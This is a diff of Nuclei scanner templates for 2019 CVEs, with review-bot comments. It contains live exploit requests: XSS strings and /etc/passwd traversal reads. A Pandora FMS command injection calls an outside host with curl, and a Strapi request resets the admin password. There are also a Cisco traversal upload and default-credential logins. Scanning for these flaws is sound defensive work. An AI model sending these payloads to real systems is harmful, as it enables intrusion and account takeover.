@@ -0,0 +1,56 @@ +id: CVE-2019-12962 + +info: + name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting + author: Clment Cruchet + severity: medium + description: | + LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting. + remediation: | + Upgrade to the latest version of LiveZilla Server or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://www.exploit-db.com/exploits/49669 + - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ + - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 + - https://github.com/anonymous364872/Rapier_Tool + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-12962 + cwe-id: CWE-79 + epss-score: 0.17333 + epss-percentile: 0.95984 + cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: livezilla + product: livezilla + shodan-query: http.html:LiveZilla + tags: cve,cve2019,xss,edb,packetstorm,livezilla + +http: + - method: GET + path: + - '{{BaseURL}}/mobile/index.php' + + headers: + Accept-Language: ';alert(document.domain)//' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var detectedLanguage = ';alert(document.domain)//';" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a004730450220730404803aefaab9552a359a9109e306f61b6f746b25c25c309b98bb2769cc44022100afd816ccce19408b01fe5861f8ea76986010736a6cdc3ffba50658a7a50a73d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
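Review bot: `author: Clment Cruchet` reads like a name that lost a non-ASCII character somewhere in transit (presumably `Clément`); since this is a new file, confirm the UTF-8 spelling before it lands. The template otherwise follows the v3 layout (`http:`, `max-request`, digest), and the body matcher pins the exact echoed `var detectedLanguage = …` string rather than a generic page marker, which keeps false positives from the static page down.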
diff --git a/nuclei-templates/CVE-2019/CVE-2019-13392.yaml b/nuclei-templates/CVE-2019/cve-2019-13392.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/CVE-2019-13392.yaml
rename to nuclei-templates/CVE-2019/cve-2019-13392.yaml
diff --git a/nuclei-templates/CVE-2019/cve-2019-13396.yaml b/nuclei-templates/CVE-2019/cve-2019-13396.yaml
deleted file mode 100644
index baf97b5f61..0000000000
--- a/nuclei-templates/CVE-2019/cve-2019-13396.yaml
+++ /dev/null
@@ -1,40 +0,0 @@ -id: CVE-2019-1336 - -info: - name: Weblogic RCE GET request - author: medbsq - severity: critical - # link: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf - - -requests: - - raw: - - | - POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - Accept-Encoding: gzip, deflate - Content-Type: application/x-www-form-urlencoded - - callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D¤t_student_id=&user=test&password=test&btn_submit=Login - - - | - POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - Accept-Encoding: gzip, deflate - Content-Type: application/x-www-form-urlencoded - - callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd - - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:[x*]:0:0:" \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-14251.yaml b/nuclei-templates/CVE-2019/cve-2019-14251.yaml deleted file mode 100644 index 721e75c0db..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-14251.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -id: CVE-2019-14251 - -info: - name: T24 Web Server - Local File Inclusion - author: 0x_Akoko - severity: high - description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server. - reference: - - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt - - https://vuldb.com/?id.146815 - - https://nvd.nist.gov/vuln/detail/CVE-2019-14251 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-14251 - cwe-id: CWE-22 - tags: cve,cve2019,temenos,lfi,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd" - - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - "for 16-bit app support" - condition: or - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/13 diff --git a/nuclei-templates/CVE-2019/CVE-2019-14470.yaml b/nuclei-templates/CVE-2019/cve-2019-14470.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-14470.yaml rename to nuclei-templates/CVE-2019/cve-2019-14470.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-14974.yaml b/nuclei-templates/CVE-2019/cve-2019-14974.yaml new file mode 100644 index 0000000000..324308f363 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-14974.yaml 
@@ -0,0 +1,29 @@ +id: CVE-2019-14974 + +info: + name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting + author: madrobot + severity: medium + tags: cve,cve2019,xss,sugarcrm + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-14974 + cwe-id: CWE-79 + description: "SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS." + reference: + - https://www.exploit-db.com/exploits/47247 + +requests: + - method: GET + path: + - "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "url = window.location.search.split(\"?desktop_url=\")[1]" + part: body diff --git a/nuclei-templates/CVE-2019/CVE-2019-15043.yaml b/nuclei-templates/CVE-2019/cve-2019-15043.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-15043.yaml rename to nuclei-templates/CVE-2019/cve-2019-15043.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-15811.yaml b/nuclei-templates/CVE-2019/cve-2019-15811.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-15811.yaml rename to nuclei-templates/CVE-2019/cve-2019-15811.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16332.yaml b/nuclei-templates/CVE-2019/cve-2019-16332.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16332.yaml rename to nuclei-templates/CVE-2019/cve-2019-16332.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16932.yaml b/nuclei-templates/CVE-2019/cve-2019-16932.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16932.yaml rename to nuclei-templates/CVE-2019/cve-2019-16932.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-17382.yaml b/nuclei-templates/CVE-2019/cve-2019-17382.yaml new file mode 100644 index 0000000000..8dfa5344ff --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-17382.yaml 
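Review bot: The `javascript:alert(1337);//itms://` value in `path` plays no part in the detection — the only content matcher looks for the page's own source line `url = window.location.search.split("?desktop_url=")[1]`, which is present whether or not `desktop_url` is supplied — so either request the page without the parameter and document the check as a source fingerprint, or add a word matcher for the reflected parameter value so a match proves the sink is reachable. The file also uses the pre-v3 `requests:` key and lacks the `metadata`/`max-request`, `impact` and `remediation` entries the commit's other new templates carry.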
@@ -0,0 +1,37 @@ +id: CVE-2019-17382 + +info: + name: Zabbix Authentication Bypass + author: harshbothra_ + severity: critical + description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. + reference: https://www.exploit-db.com/exploits/47467 + tags: cve,cve2019,zabbix,fuzz,bypass,login + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2019-17382 + cwe-id: CWE-639 + +requests: + - raw: + - | + GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en-US,en;q=0.9 + + payloads: + ids: helpers/wordlists/numbers.txt + + threads: 50 + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + words: + - "Dashboard" diff --git a/nuclei-templates/CVE-2019/cve-2019-17444.yaml b/nuclei-templates/CVE-2019/cve-2019-17444.yaml new file mode 100644 index 0000000000..b0a563e27c --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-17444.yaml 
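Review bot: The match condition is only `status 200` plus the word `Dashboard`, which is weak for a fuzzed request: a login or error page that merely mentions the dashboard would satisfy it, and with `payloads` drawn from `helpers/wordlists/numbers.txt` at `threads: 50` a single such page is enough to report the host. Tighten it with a marker that only a rendered dashboard carries, or a negative matcher for the login form, and record the wordlist size in `metadata.max-request` so the request volume is visible to operators. `reference:` is a bare string where the other templates use a list, and the file keeps the pre-v3 `requests:` key.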
@@ -0,0 +1,56 @@ +id: CVE-2019-17444 + +info: + name: Jfrog Artifactory <6.17.0 - Default Admin Password + author: pdteam + severity: critical + description: | + Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. + impact: | + An attacker can gain unauthorized access to the Jfrog Artifactory instance. + remediation: | + Upgrade Jfrog Artifactory to version 6.17.0 or later and change the default admin password to a strong, unique one. + reference: + - https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes + - https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory + - https://nvd.nist.gov/vuln/detail/CVE-2019-17444 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-17444 + cwe-id: CWE-521 + epss-score: 0.05344 + epss-percentile: 0.92917 + cpe: cpe:2.3:a:jfrog:artifactory:*:*:*:*:*:-:*:* + metadata: + max-request: 1 + vendor: jfrog + product: artifactory + framework: "-" + tags: cve,cve2019,jfrog,default-login,- + +http: + - raw: + - | + POST /ui/api/v1/ui/auth/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + X-Requested-With: XMLHttpRequest + Origin: {{RootURL}} + + {"user":"admin","password":"password","type":"login"} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"name":"admin"' + - '"admin":true' + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022100defa8caef3bfc49d27462a363fbb840af42c8534de065f888f06b35299e8683f02204ecaa3467ff227bbd38b2b2cb2433ae54ea6ea587ec1ed3e9e30ef053c3ca6c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
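Review bot: `tags: cve,cve2019,jfrog,default-login,-` ends with a bare `-` tag, and `framework: "-"` is the same placeholder — both look like the empty target_sw field of the `cpe` string (`…:*:-:*:*`) spilled into the metadata by the generator. Drop them: `tags: cve,cve2019,jfrog,default-login` and remove the `framework` line. Requiring both `"name":"admin"` and `"admin":true` under `condition: and` is the right guard against a login endpoint that answers 200 to any credential.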
diff --git a/nuclei-templates/CVE-2019/CVE-2019-17558.yaml b/nuclei-templates/CVE-2019/cve-2019-17558.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-17558.yaml rename to nuclei-templates/CVE-2019/cve-2019-17558.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-1821.yaml b/nuclei-templates/CVE-2019/cve-2019-1821.yaml new file mode 100644 index 0000000000..3c95729884 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-1821.yaml @@ -0,0 +1,51 @@ +id: CVE-2019-1821 + +info: + name: Cisco Prime Infrastructure Unauthorized RCE + author: _0xf4n9x_ + severity: critical + description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability. + reference: + - https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-1821 + metadata: + shodan-query: 'http.title:"prime infrastructure"' + tags: cve,cve2019,rce,fileupload,unauth,intrusive,cisco + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-1821 + cwe-id: CWE-20 + +requests: + - raw: + - | + POST /servlet/UploadServlet HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Primary-IP: 127.0.0.1 + Filename: test.tar + Filesize: 10240 + Compressed-Archive: false + Destination-Dir: tftpRoot + Filecount: 1 + Content-Length: 269 + Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83 + + --871a4a346a547cf05cb83f57b9ebcb83 + Content-Disposition: form-data; name="files"; filename="test.tar" + + ../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}} + --871a4a346a547cf05cb83f57b9ebcb83-- + + - | + GET /test.txt HTTP/1.1 + Host: {{Host}} + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains((body_2), '{{randstr}}')" + condition: and 
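Review bot: The verification GET uses `Host: {{Host}}` while the upload POST uses `Host: {{Hostname}}`; in nuclei `{{Host}}` is the bare host and `{{Hostname}}` is host:port, so on a non-default port the second request goes out with a different Host header than the first — make it `Host: {{Hostname}}`. The DSL mixes an unsuffixed `status_code == 200` with `body_2`; under `req-condition: true` the per-response names are suffixed, so `"status_code_2 == 200"` states which response must be 200 (as written, the upload's own status is never checked). `Content-Length: 269` is also hard-coded against a body whose `{{randstr}}` value is generated at run time; it is worth confirming the engine recomputes the header, and the tar size field in the same entry presumably has to agree with that length as well.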
diff --git a/nuclei-templates/CVE-2019/cve-2019-18371.yaml b/nuclei-templates/CVE-2019/cve-2019-18371.yaml deleted file mode 100644 index 49dfb3776c..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-18371.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2019-18371 - -info: - name: Xiaomi Mi WiFi R3G Routers - Local file Inclusion - author: ritikchaddha - severity: high - description: | - Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication. - reference: - - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html - - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py - - https://nvd.nist.gov/vuln/detail/CVE-2019-18371 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-18371 - cwe-id: CWE-22 - tags: cve2019,cve,lfi,router,mi,xiaomi - -requests: - - method: GET - path: - - "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/17 diff --git a/nuclei-templates/CVE-2019/cve-2019-18665.yaml b/nuclei-templates/CVE-2019/cve-2019-18665.yaml deleted file mode 100644 index 0af194d419..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-18665.yaml +++ /dev/null 
@@ -1,37 +0,0 @@ -id: CVE-2019-18665 - -info: - name: DOMOS 5.5 - Local File Inclusion - author: 0x_Akoko - severity: high - description: | - SECUDOS DOMOS before 5.6 allows local file inclusion via the log module. - reference: - - https://atomic111.github.io/article/secudos-domos-directory_traversal - - https://vuldb.com/?id.144804 - - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6 - - https://nvd.nist.gov/vuln/detail/CVE-2019-18665 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-18665 - cwe-id: CWE-22 - tags: cve,cve2019,domos,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/08 diff --git a/nuclei-templates/CVE-2019/cve-2019-18818.yaml b/nuclei-templates/CVE-2019/cve-2019-18818.yaml new file mode 100644 index 0000000000..597d2793e1 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-18818.yaml 
@@ -0,0 +1,52 @@ +id: CVE-2019-18818 + +info: + name: Strapi CMS - Admin password reset (Unauthenticated) + author: idealphase + description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. + reference: + - https://github.com/advisories/GHSA-6xc2-mj39-q599 + - https://www.exploit-db.com/exploits/50239 + - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 + severity: critical + tags: cve,cve2019,strapi,auth-bypass,intrusive + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-18818 + cwe-id: CWE-640 + +requests: + - raw: + - | + POST /admin/auth/reset-password HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/json + + {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header + + - type: word + condition: and + words: + - '"username":' + - '"email":' + - '"jwt":' + part: body + + extractors: + - type: json + json: + - .user.username + - .user.email \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-19134.yaml b/nuclei-templates/CVE-2019/cve-2019-19134.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-19134.yaml rename to nuclei-templates/CVE-2019/cve-2019-19134.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-19781.yaml b/nuclei-templates/CVE-2019/cve-2019-19781.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-19781.yaml rename to nuclei-templates/CVE-2019/cve-2019-19781.yaml 
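Review bot: A positive result from this template is not read-only: the POST sets the admin password to `SuperStrongPassword1` and the previous credential stops working, which the `intrusive` tag hints at but nothing in `info` states; add `impact`/`remediation` entries like the other new files in this commit and a comment above `requests:` such as `# A match means the admin password has been changed to the value in the body below; the original credential no longer works.` `Origin: {{BaseURL}}` should be `Origin: {{RootURL}}` as cve-2019-17444 in this commit does, since BaseURL can carry a path and Origin is scheme://host[:port] only. The extractor also pulls `.user.username` and `.user.email` into the report, so output from this template contains account data and should be handled as such.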
diff --git a/nuclei-templates/CVE-2019/CVE-2019-19908.yaml b/nuclei-templates/CVE-2019/cve-2019-19908.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/CVE-2019-19908.yaml
rename to nuclei-templates/CVE-2019/cve-2019-19908.yaml
diff --git a/nuclei-templates/CVE-2019/CVE-2019-20141.yaml b/nuclei-templates/CVE-2019/cve-2019-20141.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/CVE-2019-20141.yaml
rename to nuclei-templates/CVE-2019/cve-2019-20141.yaml
diff --git a/nuclei-templates/CVE-2019/CVE-2019-20210.yaml b/nuclei-templates/CVE-2019/cve-2019-20210.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/CVE-2019-20210.yaml
rename to nuclei-templates/CVE-2019/cve-2019-20210.yaml
diff --git a/nuclei-templates/CVE-2019/cve-2019-20224.yaml b/nuclei-templates/CVE-2019/cve-2019-20224.yaml
index 6cde65fe36..e6ded4687b 100644
--- a/nuclei-templates/CVE-2019/cve-2019-20224.yaml
+++ b/nuclei-templates/CVE-2019/cve-2019-20224.yaml
@@ -6,20 +6,30 @@ info: severity: high description: | Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system. + remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. reference: - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9 - https://nvd.nist.gov/vuln/detail/CVE-2019-20224 - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view - remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. + - https://pandorafms.com/downloads/solved-pandorafms-742.mp4 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-20224 cwe-id: CWE-78 - tags: pandorafms,rce,cve,cve2019,authenticated,oast - -requests: + epss-score: 0.18764 + epss-percentile: 0.95774 + cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: artica + product: pandora_fms + tags: cve,cve2019,pandorafms,rce,authenticated,oast,artica + +http: - raw: - | POST /pandora_console/index.php?login=1 HTTP/1.1 @@ -27,7 +37,6 @@ requests: Content-Type: application/x-www-form-urlencoded nick=admin&pass=admin&login_button=Login - - | POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1 Host: {{Hostname}} 
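Review bot: The login request in the second hunk hard-codes `nick=admin&pass=admin`, so although the template is tagged `authenticated` it only works against the vendor default account — an operator holding real credentials cannot use it, and a positive result conflates "default credentials still set" with the RCE itself. Make the credentials overridable: `nick={{username}}&pass={{password}}` with a template-level `variables:` block supplying `username: admin` and `password: admin` as defaults, which `-var` can then override. The second POST's body continues in the following hunk, where the `{{interactsh-url}}` injection lives. In the first hunk `remediation:` is only moved above `reference:`, which is fine.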
@@ -35,19 +44,18 @@ requests: date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw - cookie-reuse: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word + name: "http" part: interactsh_protocol - name: http words: - "http" - type: status status: - 200 - -# Enhanced by mp on 2022/06/17 +# digest: 490a00463044022046ac7207d2f9331283e0b83f2ec5f492144749de02ae7a6eb328fc4c5c3d40270220014b1f4e41a4c8e7fb88abf43f8baf6f2673f8fd542c36dcc365a951f84516a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-20354.yaml b/nuclei-templates/CVE-2019/cve-2019-20354.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-20354.yaml rename to nuclei-templates/CVE-2019/cve-2019-20354.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-20933.yaml b/nuclei-templates/CVE-2019/cve-2019-20933.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-20933.yaml rename to nuclei-templates/CVE-2019/cve-2019-20933.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-3401.yaml b/nuclei-templates/CVE-2019/cve-2019-3401.yaml new file mode 100644 index 0000000000..a3d0348acc --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-3401.yaml 
@@ -0,0 +1,33 @@ +id: CVE-2019-3401 + +info: + name: Atlassian JIRA Information Exposure (CVE-2019-3401) + author: TechbrunchFR,milo2012 + description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. + severity: medium + tags: cve,cve2019,jira,atlassian,exposure + reference: https://jira.atlassian.com/browse/JRASERVER-69244 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-3401 + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular" + matchers: + - type: word + words: + - '' + - 'Manage Filters - Jira' + condition: and + +# Remediation: +# Ensure that this permission is restricted to specific groups that require it. +# You can restrict it in Administration > System > Global Permissions. +# Turning the feature off will not affect existing filters and dashboards. +# If you change this setting, you will still need to update the existing filters and dashboards if they have already been +# shared publicly. +# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. diff --git a/nuclei-templates/CVE-2019/cve-2019-3402.yaml b/nuclei-templates/CVE-2019/cve-2019-3402.yaml deleted file mode 100644 index 00cde456b9..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-3402.yaml +++ /dev/null 
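Review bot: The seven-line `# Remediation:` comment block at the end of the file is exactly what the `remediation:` field under `info` is for, and the other templates in this commit use that field; moving the text there as a `|` block scalar makes it appear in tool output instead of only in the source. As rendered, the first `words` entry is the empty string `''`, which matches every body and reduces the `condition: and` check to the page title `Manage Filters - Jira` — if a tag was stripped in rendering restore it, otherwise drop the empty entry and add a `status` matcher. `reference:` is a bare string where the rest of the commit uses a list, and the file keeps the pre-v3 `requests:` key.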
@@ -1,21 +0,0 @@ -id: cve-2019-3402 -info: - name: Jira - Reflected XSS using searchOwnerUserName parameter. - author: pdteam - severity: medium - description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter. - reference: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c - tags: cve,cve2019,atlassian,jira,xss -requests: - - method: GET - path: - - "{{BaseURL}}//secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "" - part: body diff --git a/nuclei-templates/CVE-2019/cve-2019-3912.yaml b/nuclei-templates/CVE-2019/cve-2019-3912.yaml new file mode 100644 index 0000000000..7e2dd681ab --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-3912.yaml 
@@ -0,0 +1,43 @@ +id: CVE-2019-3912 + +info: + name: LabKey Server Community Edition <18.3.0 - Open Redirect + author: 0x_Akoko + severity: medium + description: LabKey Server Community Edition before 18.3.0-61806.763 contains an open redirect vulnerability via the /__r1/ returnURL parameter, which allows an attacker to redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. + remediation: | + Upgrade LabKey Server Community Edition to version 18.3.0 or later to mitigate the vulnerability. + reference: + - https://www.tenable.com/security/research/tra-2019-03 + - https://nvd.nist.gov/vuln/detail/CVE-2019-3912 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/StarCrossPortal/scalpel + - https://github.com/anonymous364872/Rapier_Tool + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-3912 + cwe-id: CWE-601 + epss-score: 0.0016 + epss-percentile: 0.51564 + cpe: cpe:2.3:a:labkey:labkey_server:*:*:*:*:community:*:*:* + metadata: + max-request: 1 + vendor: labkey + product: labkey_server + shodan-query: 'Server: Labkey' + tags: cve2019,cve,tenable,redirect,labkey + +http: + - method: GET + path: + - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a0047304502202facf9c390592bc28c4dac04cc1ee7e777ee2b9f47a1a52f34c28c22ea5dcc44022100eefac30fb0357569c6e6b9aedc343ad494f6fcad92bc166f018d57794331bcc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2019/cve-2019-6340.yaml b/nuclei-templates/CVE-2019/cve-2019-6340.yaml
